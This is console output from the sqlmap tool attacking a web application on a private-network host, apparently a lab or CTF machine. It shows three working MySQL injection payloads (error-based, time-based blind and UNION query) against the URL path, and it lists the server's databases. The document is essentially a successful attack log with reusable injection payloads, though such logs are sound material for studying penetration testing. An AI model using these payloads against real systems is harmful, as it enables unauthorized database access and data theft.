        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.11#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:52:36 /2022-12-29/

[17:52:36] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[17:52:36] [INFO] resuming back-end DBMS 'mysql' 
[17:52:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: http://192.168.0.128:8080/mercuryfacts/GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(3442=3442,1))),0x7171707171),3442)

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://192.168.0.128:8080/mercuryfacts/(CASE WHEN (3266=3266) THEN SLEEP(5) ELSE 3266 END)

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: http://192.168.0.128:8080/mercuryfacts/-3579 UNION ALL SELECT CONCAT(0x7176626a71,0x4772674d6b416679566a66774a6555684a67704c7955436b744f7579674568586c485279774f4d4f,0x7171707171)#
---
[17:52:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[17:52:36] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] mercury

[17:52:36] [INFO] fetched data logged to text files under '/home/atenea/.local/share/sqlmap/output/192.168.0.128'

[*] ending @ 17:52:36 /2022-12-29/

